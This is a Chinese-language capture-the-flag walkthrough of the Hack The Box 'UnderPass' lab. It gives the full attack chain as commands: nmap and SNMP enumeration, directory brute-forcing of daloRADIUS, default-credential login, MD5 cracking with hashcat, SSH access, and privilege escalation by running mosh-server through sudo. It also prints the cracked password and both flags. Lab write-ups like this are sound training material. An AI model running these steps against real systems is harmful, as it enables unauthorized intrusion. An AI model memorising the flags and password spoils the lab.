Bootstrap

HTB UnderPass靶场

HTB UnderPass靶场
连接到靶场vpn
在这里插入图片描述

第一步信息收集

nmap -sC -sV 10.10.11.48

在这里插入图片描述

可以看到开启了80端口 直接访问
在这里插入图片描述

没发现什么用处 只是ub的一个界面

扫描一下udp
在这里插入图片描述

nmap -sU --min-rate 10000  10.10.11.48 -oA udp
-sC 使用默认的脚本进行扫描
-sV 探测目标开放端口服务版本
-sT 指定Tcp协议进行扫描
-O 探测目标主机操作系统
-sU 指定以Udp协议进行扫描
--min-rate 10000 指定以10000的速率进行扫描
-p- 制定全端口进行扫描
-oA 指定全格式输出到指定目录文件夹下

发现了snmp协议端口是open
使用snmpwalk 进行 snmp 的MIB库整体遍历

sudo snmpwalk -c public -v2c 10.10.11.48

在这里插入图片描述

可以看到两个信息
在这里插入图片描述

一个是htb结尾的域名
一个是daloradius服务器

将underpass.htb域名绑定到本地hosts文件
在这里插入图片描述

访问 没发现

直接进行目录爆破

dirsearch -u "http://10.10.11.48/daloradius" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

逐个访问后得到
在这里插入图片描述

百度一下默认密码试试
在这里插入图片描述

在这里插入图片描述

成功登录
进去后发现有个user
进去看看
在这里插入图片描述

使用hashcat 进行密码hash爆破

hashcat '412DD4759978ACFCC81DEAB01B382403' -m 0 -a 0 /usr/share/wordlists/rockyou.txt

参数:
-m 0:这个选项指定了要使用的哈希类型。-m代表mode(模式),0是MD5哈希的标识符。
/usr/share/wordlists/rockyou.txt:这是用于破解哈希值的字典文件的路径。
在这里插入图片描述

可以看到密码为:underwaterfriends

直接进行ssh连接
在这里插入图片描述

并且获得到了第一个flag
a7f19dcbcb2dd03aa41bda07806f63ba

接下来进行提权
在这里插入图片描述
使用mosh进行提权

mosh --server="sudo /usr/bin/mosh-server" localhost

在这里插入图片描述

成功获得第二个flag
755cbe51f0efca5a3ee713fb4b4d05ec

在这里插入图片描述

;